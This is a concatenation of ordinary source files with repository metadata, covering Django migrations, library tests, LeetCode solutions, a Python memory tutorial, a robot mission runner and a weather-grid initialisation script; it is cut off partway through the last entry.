d0d9bc0c393953fc4d66a087de4a0606ec41154a | 558cc75ea0e093f0b27197654bd0162cce688e03 | /social_network/migrations/0026_auto_20200421_1257.py | f3eb7084107ea6ba18e1d6df8806d5a2e038e20b | [] | no_license | seniordev0425/Python-Rafflee | 89766de8bad96ca919a34df2f0820d24b9258808 | 37da2e7a37a0b0b5332ff036f80814598ed57c0b | refs/heads/master | 2022-11-26T20:46:32.082517 | 2020-08-07T03:01:21 | 2020-08-07T03:01:21 | 285,723,146 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 490 | py | # Generated by Django 2.2.12 on 2020-04-21 12:57
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('social_network', '0025_auto_20200421_1249'),
]
operations = [
migrations.AlterField(
model_name='socialaction',
name='twitter_follow_type',
field=models.CharField(choices=[('user_id', 'USER_ID'), ('screen_name', 'SCREEN_NAME')], max_length=15, null=True),
),
]
| [
"seniordev0425@gmail.com"
] | seniordev0425@gmail.com |
1966df5213bd6122c4be02f75e2f4bcc6599ffe1 | 21962ae2b724f4679683dab3f30306f59e6da834 | /pylastests/test_header.py | 49e238a807790d4374c6b55a4018de7aed87d511 | [
"BSD-3-Clause"
] | permissive | GeolearnAI/pylas | 7b54178809ee6f7a60525f6ad85ad58385b99310 | 7a5bbada702d927e4f78d5c2883dcc98f808d831 | refs/heads/master | 2022-09-18T11:28:45.593005 | 2020-06-06T12:23:58 | 2020-06-06T12:23:58 | 278,429,549 | 0 | 0 | null | 2020-07-09T17:32:31 | 2020-07-09T17:32:31 | null | UTF-8 | Python | false | false | 3,146 | py | import pylas
from pylastests import test_common
all_las_but_1_4 = test_common.all_las_but_1_4
def test_number_of_points_return_is_updated(all_las_but_1_4):
las = all_las_but_1_4
nb_points = len(las.points_data)
nb_slice = 3
r = las.return_number
for i in reversed(range(nb_slice)):
r[i * (nb_points // nb_slice): (i + 1) * (nb_points // nb_slice)] = i
las.return_number = r
las = test_common.write_then_read_again(las)
assert (
tuple(las.header.number_of_points_by_return[:nb_slice])
== (nb_points // nb_slice,) * nb_slice
)
assert tuple(las.header.number_of_points_by_return[nb_slice:]) == (0,) * (
len(las.header.number_of_points_by_return) - nb_slice
)
def test_nb_points_return_1_4():
las = pylas.read(test_common.test1_4_las)
r = las.return_number
for i in reversed(range(15)):
r[i] = i
r[14:] = 15
las.return_number = r
las = test_common.write_then_read_again(las)
assert tuple(las.header.number_of_points_by_return) == ((1,) * 14) + (
len(las.points_data) - 14,
)
def test_header_copy():
import copy
las = pylas.read(test_common.simple_las)
header_copy = copy.copy(las.header)
assert header_copy.point_format_id == las.header.point_format_id
assert header_copy.version == las.header.version
header_copy.point_format_id = 0
assert header_copy.point_format_id != las.header.point_format_id
assert header_copy.version == las.header.version
def test_set_uuid():
import uuid
las = pylas.read(test_common.simple_las)
u = uuid.uuid4()
las.header.uuid = u
las = test_common.write_then_read_again(las)
assert las.header.uuid == u
def test_set_offsets():
header = pylas.headers.HeaderFactory.new('1.2')
header.offsets = [0.5, 0.6, 0.7]
assert 0.5 == header.x_offset
assert 0.6 == header.y_offset
assert 0.7 == header.z_offset
assert [0.5, 0.6, 0.7] == list(header.offsets)
def test_set_scales():
header = pylas.headers.HeaderFactory.new('1.2')
header.scales = [0.001, 0.001, 0.01]
assert 0.001 == header.x_scale
assert 0.001 == header.y_scale
assert 0.01 == header.z_scale
assert [0.001, 0.001, 0.01] == list(header.scales)
def test_set_maxs():
header = pylas.headers.HeaderFactory.new('1.2')
values = [42.0, 1337.42, 553.3]
header.maxs = values
assert values[0] == header.x_max
assert values[1] == header.y_max
assert values[2] == header.z_max
assert values == list(header.maxs)
def test_set_mins():
header = pylas.headers.HeaderFactory.new('1.2')
values = [42.0, 1337.42, 553.3]
header.mins = values
assert values[0] == header.x_min
assert values[1] == header.y_min
assert values[2] == header.z_min
assert values == list(header.mins)
def test_point_count_stays_synchronized():
las = pylas.read(test_common.simple_las)
assert las.header.point_count == len(las.points_data)
las.points = las.points[:120]
assert 120 == las.header.point_count
assert las.header.point_count == len(las.points_data)
| [
"thomas.montaigu@laposte.net"
] | thomas.montaigu@laposte.net |
905af0071c737e9ee131d302fd623eb668532ec3 | ef3a7391b0a5c5d8e276355e97cbe4de621d500c | /venv/Lib/site-packages/spacy/tests/lang/en/test_text.py | a7ebde9898add7b47514cf89f800b00e9f28a74b | [
"Apache-2.0"
] | permissive | countBMB/BenjiRepo | 143f6da5d198ea6f06404b4559e1f4528b71b3eb | 79d882263baaf2a11654ca67d2e5593074d36dfa | refs/heads/master | 2022-12-11T07:37:04.807143 | 2019-12-25T11:26:29 | 2019-12-25T11:26:29 | 230,090,428 | 1 | 1 | Apache-2.0 | 2022-12-08T03:21:09 | 2019-12-25T11:05:59 | Python | UTF-8 | Python | false | false | 1,898 | py | # coding: utf-8
from __future__ import unicode_literals
import pytest
from spacy.lang.en.lex_attrs import like_num
def test_en_tokenizer_handles_long_text(en_tokenizer):
text = """Tributes pour in for late British Labour Party leader
Tributes poured in from around the world Thursday
to the late Labour Party leader John Smith, who died earlier from a massive
heart attack aged 55.
In Washington, the US State Department issued a statement regretting "the
untimely death" of the rapier-tongued Scottish barrister and parliamentarian.
"Mr. Smith, throughout his distinguished"""
tokens = en_tokenizer(text)
assert len(tokens) == 76
@pytest.mark.parametrize(
"text,length",
[
("The U.S. Army likes Shock and Awe.", 8),
("U.N. regulations are not a part of their concern.", 10),
("“Isn't it?”", 6),
("""Yes! "I'd rather have a walk", Ms. Comble sighed. """, 15),
("""'Me too!', Mr. P. Delaware cried. """, 11),
("They ran about 10km.", 6),
pytest.param(
"But then the 6,000-year ice age came...", 10, marks=pytest.mark.xfail()
),
],
)
def test_en_tokenizer_handles_cnts(en_tokenizer, text, length):
tokens = en_tokenizer(text)
assert len(tokens) == length
@pytest.mark.parametrize(
"text,match",
[
("10", True),
("1", True),
("10,000", True),
("10,00", True),
("999.0", True),
("one", True),
("two", True),
("billion", True),
("dog", False),
(",", False),
("1/2", True),
],
)
def test_lex_attrs_like_number(en_tokenizer, text, match):
tokens = en_tokenizer(text)
assert len(tokens) == 1
assert tokens[0].like_num == match
@pytest.mark.parametrize("word", ["eleven"])
def test_en_lex_attrs_capitals(word):
assert like_num(word)
assert like_num(word.upper())
| [
"bengmen92@gmail.com"
] | bengmen92@gmail.com |
834f1bf7004dbffd444b639a44a6dd308b70ec95 | 796b8a166edc28dd04d23244b698742a607bc23f | /Leetcode/140. Word Break II.py | f899b9fa0812e2d472653987c6dc2e7d94fa7583 | [] | no_license | brlala/Educative-Grokking-Coding-Exercise | 54f18309d89784fbf9452b5b609cd30e54378c46 | e50dc0642f087f37ab3234390be3d8a0ed48fe62 | refs/heads/master | 2023-04-22T07:34:37.360508 | 2021-05-02T11:16:47 | 2021-05-02T11:16:47 | 299,006,488 | 3 | 1 | null | null | null | null | UTF-8 | Python | false | false | 789 | py | class Solution:
def wordBreak(self, s: str, wordDict: list[str]) -> list[str]:
"""
https://leetcode.com/problems/word-break-ii/discuss/44368/Python-easy-to-understand-solutions-(memorization%2BDFS-DP%2BDFS)
"""
memo = {}
return self.dfs(s, set(wordDict), memo)
def dfs(self, s, wordDict, memo):
if s in memo:
return memo[s]
if not s:
return [""]
res = []
for i in range(1, len(s) + 1):
if s[:i] in wordDict:
for word in self.dfs(s[i:], wordDict, memo):
res.append(s[:i] + (" " if word else "") + word)
memo[s] = res
return res
a = Solution()
a.wordBreak(s="catsanddog", wordDict=["cat", "cats", "and", "sand", "dog"])
| [
"liheng@pand.ai"
] | liheng@pand.ai |
a9d4ac0dc4600aad5c813e4f10bbfc32474689da | 5c099927aedc6fdbc515f40ff543c65b3bf4ec67 | /algorithms/reach-a-number/src/Solution.py | d0db1844032445cbf8a4d7b18d9dca9e6ff0fe52 | [] | no_license | bingzhong-project/leetcode | 7a99cb6af1adfbd9bb1996a7f66a65679053c478 | ba82e7d94840b3fec272e4c5f82e3a2cfe4b0505 | refs/heads/master | 2020-04-15T09:27:33.979519 | 2020-03-10T03:43:07 | 2020-03-10T03:43:07 | 164,550,933 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 242 | py | class Solution:
def reachNumber(self, target: int) -> int:
target = abs(target)
res = 0
sum = 0
while sum < target or (sum - target) % 2 == 1:
res += 1
sum += res
return res
| [
"zhongyongbin@foxmail.com"
] | zhongyongbin@foxmail.com |
149ae6b89e08984c8892fd21814a9ce971fb68fc | cad9c13ad5864317d7687b44f39db42a402f36f0 | /lec03_function/memory_model.py | e0d53d8b99bd2f5313bda8b0570513bc336febf0 | [] | no_license | handaeho/lab_python | 12b686eb0d57358509f2d0cd607064deced5b25d | da068ea62682ffa70c7d23dde4ef132c49a81364 | refs/heads/master | 2020-11-26T08:22:27.656109 | 2020-04-13T02:28:47 | 2020-04-13T02:28:47 | 229,013,932 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,147 | py | """
파이썬 메모리 모델 - 파이썬이 변수들의 메모리 공간을 관리하는 방법.
"""
n1 = 1
print(f'주소 : {id(n1)}, 저장된 값 : {n1}') # 주소 : 140719357063440, 저장된 값 : 1
n2 = n1
print(f'주소 = {id(n2)}, 저장된 값 = {n2}') # 주소 = 140719357063440, 저장된 값 = 1
n2 = 2
print(f'주소 = {id(n2)}, 저장된 값 = {n2}') # 주소 = 140719357063472, 저장된 값 = 2
n3 = 1
print(f'주소 = {id(n3)}, 저장된 값 = {n3}') # 주소 = 140719357063440, 저장된 값 = 1
n3 = 3 - 1
print(f'주소 = {id(n3)}, 저장된 값 = {n3}') # 주소 = 140719357063472, 저장된 값 = 2
s1 = 'abc'
s2 = 'abc'
print(f'주소 = {id(s1)}, 저장된 값 = {s1}') # 주소 = 2376176854256, 저장된 값 = abc
print(f'주소 = {id(s2)}, 저장된 값 = {s2}') # 주소 = 2376176854256, 저장된 값 = abc
# 저장된 값이 같은 것들은 주소가 서로 같음. => 숫자 / 문자열인 경우, 생성된 객체를 캐싱(재활용)
# 숫자 / 문자열이 아닌 객체는, 값이 같아도 주소가 다름.(캐싱 X. 주소가 새롭게 생성됨)
list1 = [1, 2, 3]
list2 = [1, 2, 3]
print(f'주소 = {id(list1)}, 저장된 값 = {list1}') # 주소 = 2290452484680, 저장된 값 = [1, 2, 3]
print(f'주소 = {id(list2)}, 저장된 값 = {list2}') # 주소 = 2290452485192, 저장된 값 = [1, 2, 3]
list3 = list2
print(f'주소 = {id(list3)}, 저장된 값 = {list3}') # list2를 참조 했기 때문에 list2와 list3의 주소는 같음.
list2[0] = 100
print(list2, list3) # [100, 2, 3] [100, 2, 3]
# list2를 변경했더니, list3까지도 같이 변경되었다. ~~~> list2와 list3의 주소가 서로 같기 때문.
list3[1] = 200
print(list2, list3) # [100, 200, 3] [100, 200, 3]
# 마찬가지로, list3을 변경하면 list2도 같이 변경된다.
# 정리하자면 list1과 list2는 다른 객체(주소가 다름), list2와 list3은 같은 객체.(주소가 같음)
# '==' 연산자 VS 'is' 연산자
a = [1, 2, 3]
b = [1, 2, 3]
print(f'== : {a == b}, is : {a is b}') # == : True, is : False
# '==' ~~~~~> 서로 '값'이 같은가? / 'is' ~~~~~> 서로 '주소'가 같은가?
| [
"mrdh94@naver.com"
] | mrdh94@naver.com |
dd9bf12890563e9f4e394367ee17592436c4db4e | c2210b7012d2cd608ba1c350169107fe79584568 | /helmet_seatbelt/src/python3/websocket-test0.py | 05cf8c319d37e16fb10b6e2696f67f4e190b8d93 | [] | no_license | ISCAS007/demo | 9165eb2765f35a93abf790977358b55a39cb5d7d | 92addff2e4a09f58ac405b9ce155f79604ac8169 | refs/heads/master | 2023-05-09T18:14:38.153027 | 2019-12-03T03:22:38 | 2019-12-03T03:22:38 | 375,907,498 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 479 | py | #!/usr/bin/env python3
import asyncio
import websockets
import sys
@asyncio.coroutine
def hello():
websocket = yield from websockets.connect('ws://t.qdrise.com.cn:1234/')
try:
name=sys.argv[1]
yield from websocket.send(name)
print("> {}".format(name))
greeting = yield from websocket.recv()
print("< {}".format(greeting))
finally:
yield from websocket.close()
asyncio.get_event_loop().run_until_complete(hello())
| [
"youdaoyzbx@163.com"
] | youdaoyzbx@163.com |
c3d423561ba81e648124b4013b007394c0427eff | e665fe109ce9823d965e303ca8677b5a065ad9df | /mission/runner.py | d1907d30f805a18b3e0801c7c0ac9525481d2f53 | [
"BSD-3-Clause"
] | permissive | deciament/software | 822a704dfaab84f5260a284271cdec1b3664b94f | 06ad1d9ea239d116252510beed248bc6031cd622 | refs/heads/master | 2021-01-14T12:40:04.946245 | 2015-12-31T02:28:33 | 2015-12-31T02:28:33 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,653 | py | #!/usr/bin/env python3.4
import time, argparse, traceback, sys, datetime, os, shm
# Note: this is a hack; will only function if your PYTHONPATH is solely the standard software one (~/cuauv/software; i.e. the root directory of the repo)
pythonpath = os.environ.get('PYTHONPATH')
sys.path.append(pythonpath + '/mission')
from auv_python_helpers.colors import *
from mission.framework.auxiliary import zero_outputs
from mission.framework.task import Task
from auvlog.client import log as auvlog
def foldl(f, acc, l):
for i in l:
acc = f(acc, i)
return acc
def exit(status):
shm.mission_start_switch.mission_start.set(0)
sys.exit(status)
parser = argparse.ArgumentParser()
parser.add_argument(
'-n',
'--nticks',
help='Run N mission ticks instead of running continuously.',
default=None,
type=int)
parser.add_argument(
'-t',
'--task',
help='Task name to load; default "Main".',
default='Main',
type=str)
parser.add_argument(
'-f',
'--file',
help='File from which to load the task; default "teagle.py".',
default='teagle.py',
type=str)
parser.add_argument(
'-r',
'--rate',
help='Number of mission ticks to run per second; default 50',
default=50,
type=int)
parser.add_argument(
'-q',
'--quiet',
help="Don't ouput diagnostic messages.",
default=False,
type=bool)
args = parser.parse_args()
def fmt(n_ticks, msg):
return '[{0}] ({1}) Tick: {2} Message: {3}'.format(red(datetime.datetime.now().isoformat()), yellow('MISSION'), green(str(n_ticks)), msg)
def log(n_ticks, msg):
if not args.quiet:
print(fmt(n_ticks, msg))
def error(n_ticks, msg):
sys.stderr.write(fmt(n_ticks, msg) + "\n")
sys.stderr.flush()
def logR(n_ticks, msg):
if not args.quiet:
print(fmt(n_ticks, msg) + '\r', end = '')
if __name__ == '__main__':
try:
module_name = args.file[:-3] if args.file[-3:] == '.py' else args.file
split = module_name.split('.')
# Python imports are ludicrous.
module = __import__(module_name)
print("HELLLLO")
module = foldl(lambda x, y: getattr(x, y), __import__(split[0]), split[1:])
except ImportError as e:
error(0, 'Error importing module "{0}". Perhaps this file does not exist or is not in your PYTHONPATH.'.format(args.file))
error(0, 'Traceback: \n\n{0}'.format(traceback.format_exc()))
exit(1)
try:
task = getattr(module, args.task)
except AttributeError:
error(0, 'Error loading task "{0}". Perhaps this task does not exist within the specified file or was misspelled.'.format(args.task))
exit(1)
n_ticks = 0
last = time.time()
try:
log(0, 'Starting mission.')
shm.mission_start_switch.mission_start.set(1)
while args.nticks is None or n_ticks < args.nticks:
start = time.time()
delta = start - last
try:
task()
except Exception as e:
print(e)
time.sleep(max((1 / args.rate) - delta, 0))
if hasattr(task, 'finished') and task.finished:
error(n_ticks, 'Mission complete.')
zero_outputs()
exit(0)
else:
logR(n_ticks, 'Ticked.')
n_ticks += 1
last = start
if args.nticks == n_ticks:
log(n_ticks, 'Mission complete.')
zero_outputs()
exit(0)
error(n_ticks, "Should not be here!")
except Exception as e:
error(n_ticks, 'Exception encountered. Traceback: \n\n{0}'.format(traceback.format_exc()))
error(n_ticks, 'Mission terminated; zeroing outputs.')
zero_outputs()
# exit(1)
except KeyboardInterrupt:
zero_outputs()
exit(0)
| [
"software@cuauv.org"
] | software@cuauv.org |
c26fd50d1c7bcce85657403551fdc8dcd43b54cd | c3614e4bc024f4c0f619eaa05ce3f2e068d2e82d | /cutting_game.py | e4236f6016472df8e83d460246c1aa1bf42ee696 | [] | no_license | yukikawana/aoj | 68b2853b52975d4d066cd91b8cc6ee57c7c7d5c1 | cf53dc9957f02185e8b83b9c2ee28079ba88b2a5 | refs/heads/master | 2020-04-01T17:55:29.259738 | 2018-10-17T09:15:44 | 2018-10-17T09:15:44 | 153,459,439 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 545 | py | from utils import input_int
mem = {}
def grundy(H, W):
key = (H, W)
if key in mem:
return mem[key]
s = []
for h in range(2, H - 1):
s.append(grundy(h, W) ^ grundy(H - h, W))
for w in range(2, W - 1):
s.append(grundy(H, w) ^ grundy(H, W - w))
cnt = 0
while cnt in s:
cnt+=1
mem[key] = cnt
return mem[key]
def main():
H = input_int("h = ")
W = input_int("w = ")
print("Alice wins" if grundy(H, W) else "Bob wins")
if __name__ == "__main__":
main()
| [
"kojirou.tensou@gmail.com"
] | kojirou.tensou@gmail.com |
e10e9064f3dc573fd39344ceefbdf8c3bcd548cf | b2b1e16968474ed573ebbebc1ee84bca59adbae1 | /ExcelParser/CountRows.py | f2759fce4c40fa1930aaef464718571aec7d2c72 | [] | no_license | shahpriyesh/PracticeCode | a03979d92a092bdbb5d0c7cfc1cfebc3f82e1c91 | 2afc3d0b3cd58d80ceb825a3ff0d190893e729fa | refs/heads/master | 2022-11-29T12:37:01.719792 | 2020-07-27T18:02:51 | 2020-07-27T18:02:51 | 257,656,209 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,139 | py | import xlrd
from openpyxl import *
def countEqualEntries(excel_file, sheet_name):
wb = xlrd.open_workbook(excel_file)
sheet = wb.sheet_by_name(sheet_name)
counter = {}
for i in range(1, sheet.nrows):
row = sheet.row_values(i)
if row[0] in counter:
counter[row[0]][0] += 1
if isinstance(row[-2], str):
counter[row[0]][3].append(row[-2])
else:
# List contains (Count, Question string, difficulty level, list of company names)
if 'Easy' in row:
counter[row[0]] = [1, row[1], 'Easy', []]
elif 'Medium' in row:
counter[row[0]] = [1, row[1], 'Medium', []]
else:
counter[row[0]] = [1, row[1], 'Hard', []]
if isinstance(row[-2], str):
counter[row[0]][3].append(row[-2])
wb.release_resources()
del wb
return counter
def writeTotalEntries(excel_file, sheet_name, counter):
wb = load_workbook(excel_file)
sheet = wb[sheet_name]
unique = set()
for i in range(1, sheet.max_row):
c1 = sheet.cell(row=i, column=1)
c9 = sheet.cell(row=i, column=9)
c10 = sheet.cell(row=i, column=10)
c11 = sheet.cell(row=i, column=11)
# writing values to cells
if c1.value and c1.value not in unique:
mapping = counter[c1.value]
c9.value = mapping[0]
c10.value = mapping[2]
c11.value = ', '.join(mapping[3])
unique.add(c1.value)
wb.save(excel_file)
wb.close()
def reformatEntries(excel_file, sheet_name):
unique = set()
wb = load_workbook(excel_file)
sheet = wb[sheet_name]
for i in range(1, sheet.max_row):
c1 = sheet.cell(row=i, column=1)
if c1.value in unique:
sheet.delete_rows(i, 1)
unique.add(c1.value)
wb.save(excel_file)
wb.close()
filename = "/Users/pshah/Downloads/Leetcode_FAQ.xlsx"
sheetname = "FAQs"
counter = countEqualEntries(filename, sheetname)
writeTotalEntries(filename, sheetname, counter)
# reformatEntries(filename, sheetname) | [
"priyesh.shah@hitachivantara.com"
] | priyesh.shah@hitachivantara.com |
bbc0777dcd645f87565fccb02a0a3c22c08f6d20 | ae9fc81dd2a93a614c8e579b570ac3f4d2962392 | /Application/ReclamaCaicoProject/ReclamaCaicoApp/migrations/0001_initial.py | b020c4f1719f8084cc01a6631931c51963a8fdd4 | [
"MIT"
] | permissive | WesleyVitor/ReclamaCaico | c3743d40771a808c8238a93513ef54829413d314 | df67997821fc00236f1d9c77e8685ed8e4a6934b | refs/heads/master | 2022-12-10T21:43:23.615702 | 2020-09-17T17:18:34 | 2020-09-17T17:18:34 | 260,520,207 | 0 | 0 | MIT | 2020-09-17T17:18:35 | 2020-05-01T17:38:45 | Python | UTF-8 | Python | false | false | 1,912 | py | # Generated by Django 2.2.2 on 2019-09-02 11:25
from django.conf import settings
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
initial = True
dependencies = [
migrations.swappable_dependency(settings.AUTH_USER_MODEL),
]
operations = [
migrations.CreateModel(
name='Login',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('username', models.CharField(max_length=200)),
('password', models.CharField(max_length=200)),
],
),
migrations.CreateModel(
name='Reclamacao',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('titulo', models.CharField(default='w', max_length=20)),
('nome', models.CharField(max_length=200)),
('bairro', models.CharField(max_length=200)),
('rua', models.CharField(max_length=200)),
('Ncasa', models.IntegerField()),
('foto', models.ImageField(default='w', upload_to='Reclama')),
('descricao', models.TextField(default='w', max_length=300)),
('user', models.ForeignKey(null=True, on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL)),
],
),
migrations.CreateModel(
name='Comentario',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('text1', models.TextField(max_length=1000)),
('idd', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='ReclamaCaicoApp.Reclamacao')),
],
),
]
| [
"wesleydemorais@outlook.com.br"
] | wesleydemorais@outlook.com.br |
f3eaff00fba343a8a4a7f1ceb74a608f98fca37c | 99ba551645dc9beed36f0478b396977c50c3e7ef | /leetcode-vscode/438.找到字符串中所有字母异位词.py | da5c5fdcfc35c7bed066617bb31112a2426144bb | [] | no_license | wulinlw/leetcode_cn | 57381b35d128fb3dad027208935d3de3391abfd0 | b0f498ebe84e46b7e17e94759dd462891dcc8f85 | refs/heads/master | 2021-08-09T17:26:45.688513 | 2021-07-15T14:38:30 | 2021-07-15T14:38:30 | 134,419,586 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,625 | py | #
# @lc app=leetcode.cn id=438 lang=python3
#
# [438] 找到字符串中所有字母异位词
#
# https://leetcode-cn.com/problems/find-all-anagrams-in-a-string/description/
#
# algorithms
# Medium (41.20%)
# Likes: 247
# Dislikes: 0
# Total Accepted: 21.8K
# Total Submissions: 51.4K
# Testcase Example: '"cbaebabacd"\n"abc"'
#
# 给定一个字符串 s 和一个非空字符串 p,找到 s 中所有是 p 的字母异位词的子串,返回这些子串的起始索引。
#
# 字符串只包含小写英文字母,并且字符串 s 和 p 的长度都不超过 20100。
#
# 说明:
#
#
# 字母异位词指字母相同,但排列不同的字符串。
# 不考虑答案输出的顺序。
#
#
# 示例 1:
#
#
# 输入:
# s: "cbaebabacd" p: "abc"
#
# 输出:
# [0, 6]
#
# 解释:
# 起始索引等于 0 的子串是 "cba", 它是 "abc" 的字母异位词。
# 起始索引等于 6 的子串是 "bac", 它是 "abc" 的字母异位词。
#
#
# 示例 2:
#
#
# 输入:
# s: "abab" p: "ab"
#
# 输出:
# [0, 1, 2]
#
# 解释:
# 起始索引等于 0 的子串是 "ab", 它是 "ab" 的字母异位词。
# 起始索引等于 1 的子串是 "ba", 它是 "ab" 的字母异位词。
# 起始索引等于 2 的子串是 "ab", 它是 "ab" 的字母异位词。
#
#
#
from typing import List
# @lc code=start
class Solution:
def findAnagrams(self, s: str, p: str) -> List[int]:
left, right = 0, 0 #滑动窗口左边边界
window = {} #滑动窗口
need = {} #统计p的字符数
re = []
for i in p:
need[i] = need.get(i,0) + 1
for right in range(len(s)): #右边窗口滑动
window[s[right]] = window.get(s[right], 0) + 1 #每次滑动新加入右侧值到window中
if left + len(p) == right: #窗口满了,那就把左边的弹出去
if window[s[left]] == 1: #只有1个时需要删掉key,不然后面dict对比有问题
window.pop(s[left])
else:
window[s[left]] -= 1
left += 1 #左窗口右移一位
if window == need: #一样就把左窗口坐标加入结果
re.append(left)
return re
# @lc code=end
s = "cbaebabacd"
p = "abc"
# s = "abab"
# p = "ab"
# s = "baa"
# p = "aa"
o = Solution()
print(o.findAnagrams(s, p)) | [
"wulinlw@gmail.com"
] | wulinlw@gmail.com |
8cda640d958088ed52e602287e97730545bd2a62 | a99a44aee5cfc5e080f6d83d2bcc1c3d273a3426 | /scripts/iemre/init_hourly.py | 4876319dfe3c2b9cd95b3aa45e88caad6deaf8c6 | [
"MIT"
] | permissive | ragesah/iem | 1513929c8bc7f254048271d61b4c4cf27a5731d7 | 8ed970d426bddeaa3e7ded593665d22f0f9f6e87 | refs/heads/main | 2023-08-20T20:01:15.480833 | 2021-10-12T15:44:52 | 2021-10-12T15:44:52 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 5,467 | py | """Generate the IEMRE hourly analysis file for a year"""
import datetime
import sys
import os
import geopandas as gpd
import numpy as np
from pyiem import iemre
from pyiem.grid.zs import CachingZonalStats
from pyiem.util import get_dbconn, ncopen, logger
LOG = logger()
def init_year(ts):
"""
Create a new NetCDF file for a year of our specification!
"""
fn = iemre.get_hourly_ncname(ts.year)
if os.path.isfile(fn):
LOG.info("Cowardly refusing to overwrite: %s", fn)
return
nc = ncopen(fn, "w")
nc.title = "IEM Hourly Reanalysis %s" % (ts.year,)
nc.platform = "Grided Observations"
nc.description = "IEM hourly analysis on a 0.125 degree grid"
nc.institution = "Iowa State University, Ames, IA, USA"
nc.source = "Iowa Environmental Mesonet"
nc.project_id = "IEM"
nc.realization = 1
nc.Conventions = "CF-1.0"
nc.contact = "Daryl Herzmann, akrherz@iastate.edu, 515-294-5978"
nc.history = ("%s Generated") % (
datetime.datetime.now().strftime("%d %B %Y"),
)
nc.comment = "No Comment at this time"
# Setup Dimensions
nc.createDimension("lat", iemre.NY)
nc.createDimension("lon", iemre.NX)
ts2 = datetime.datetime(ts.year + 1, 1, 1)
days = (ts2 - ts).days
LOG.info("Year %s has %s days", ts.year, days)
nc.createDimension("time", int(days) * 24)
# Setup Coordinate Variables
lat = nc.createVariable("lat", float, ("lat",))
lat.units = "degrees_north"
lat.long_name = "Latitude"
lat.standard_name = "latitude"
lat.axis = "Y"
lat[:] = iemre.YAXIS
lon = nc.createVariable("lon", float, ("lon",))
lon.units = "degrees_east"
lon.long_name = "Longitude"
lon.standard_name = "longitude"
lon.axis = "X"
lon[:] = iemre.XAXIS
tm = nc.createVariable("time", float, ("time",))
tm.units = "Hours since %s-01-01 00:00:0.0" % (ts.year,)
tm.long_name = "Time"
tm.standard_name = "time"
tm.axis = "T"
tm.calendar = "gregorian"
tm[:] = np.arange(0, int(days) * 24)
# Tracked variables
hasdata = nc.createVariable("hasdata", np.int8, ("lat", "lon"))
hasdata.units = "1"
hasdata.long_name = "Analysis Available for Grid Cell"
hasdata.coordinates = "lon lat"
hasdata[:] = 0
# can storage -128->127 actual values are 0 to 100
skyc = nc.createVariable(
"skyc", np.int8, ("time", "lat", "lon"), fill_value=-128
)
skyc.long_name = "ASOS Sky Coverage"
skyc.stanard_name = "ASOS Sky Coverage"
skyc.units = "%"
skyc.valid_range = [0, 100]
skyc.coordinates = "lon lat"
# 0->65535
tmpk = nc.createVariable(
"tmpk", np.uint16, ("time", "lat", "lon"), fill_value=65535
)
tmpk.units = "K"
tmpk.scale_factor = 0.01
tmpk.long_name = "2m Air Temperature"
tmpk.standard_name = "2m Air Temperature"
tmpk.coordinates = "lon lat"
# 0->65535 0 to 655.35
dwpk = nc.createVariable(
"dwpk", np.uint16, ("time", "lat", "lon"), fill_value=65335
)
dwpk.units = "K"
dwpk.scale_factor = 0.01
dwpk.long_name = "2m Air Dew Point Temperature"
dwpk.standard_name = "2m Air Dew Point Temperature"
dwpk.coordinates = "lon lat"
# NOTE: we need to store negative numbers here, gasp
# -32768 to 32767 so -65.5 to 65.5 mps
uwnd = nc.createVariable(
"uwnd", np.int16, ("time", "lat", "lon"), fill_value=32767
)
uwnd.scale_factor = 0.002
uwnd.units = "meters per second"
uwnd.long_name = "U component of the wind"
uwnd.standard_name = "U component of the wind"
uwnd.coordinates = "lon lat"
# NOTE: we need to store negative numbers here, gasp
# -32768 to 32767 so -65.5 to 65.5 mps
vwnd = nc.createVariable(
"vwnd", np.int16, ("time", "lat", "lon"), fill_value=32767
)
vwnd.scale_factor = 0.002
vwnd.units = "meters per second"
vwnd.long_name = "V component of the wind"
vwnd.standard_name = "V component of the wind"
vwnd.coordinates = "lon lat"
# 0->65535 0 to 655.35
p01m = nc.createVariable(
"p01m", np.uint16, ("time", "lat", "lon"), fill_value=65535
)
p01m.units = "mm"
p01m.scale_factor = 0.01
p01m.long_name = "Precipitation"
p01m.standard_name = "Precipitation"
p01m.coordinates = "lon lat"
p01m.description = "Precipitation accumulation for the hour valid time"
nc.close()
def compute_hasdata(year):
"""Compute the has_data grid"""
nc = ncopen(iemre.get_hourly_ncname(year), "a", timeout=300)
czs = CachingZonalStats(iemre.AFFINE)
pgconn = get_dbconn("postgis")
states = gpd.GeoDataFrame.from_postgis(
"SELECT the_geom, state_abbr from states",
pgconn,
index_col="state_abbr",
geom_col="the_geom",
)
data = np.flipud(nc.variables["hasdata"][:, :])
czs.gen_stats(data, states["the_geom"])
for nav in czs.gridnav:
if nav is None:
continue
grid = np.ones((nav.ysz, nav.xsz))
grid[nav.mask] = 0.0
jslice = slice(nav.y0, nav.y0 + nav.ysz)
islice = slice(nav.x0, nav.x0 + nav.xsz)
data[jslice, islice] = np.where(grid > 0, 1, data[jslice, islice])
nc.variables["hasdata"][:, :] = np.flipud(data)
nc.close()
def main(argv):
"""Go Main Go"""
year = int(argv[1])
init_year(datetime.datetime(year, 1, 1))
compute_hasdata(year)
if __name__ == "__main__":
main(sys.argv)
| [
"akrherz@iastate.edu"
] | akrherz@iastate.edu |
805e26a503b1e54e65411035aebfd19197d9f38b | 9ae6ce54bf9a2a86201961fdbd5e7b0ec913ff56 | /google/ads/googleads/v9/enums/types/ad_group_criterion_approval_status.py | 76072e9401b3ddc6e578d95c993b65b3da5a7ca1 | [
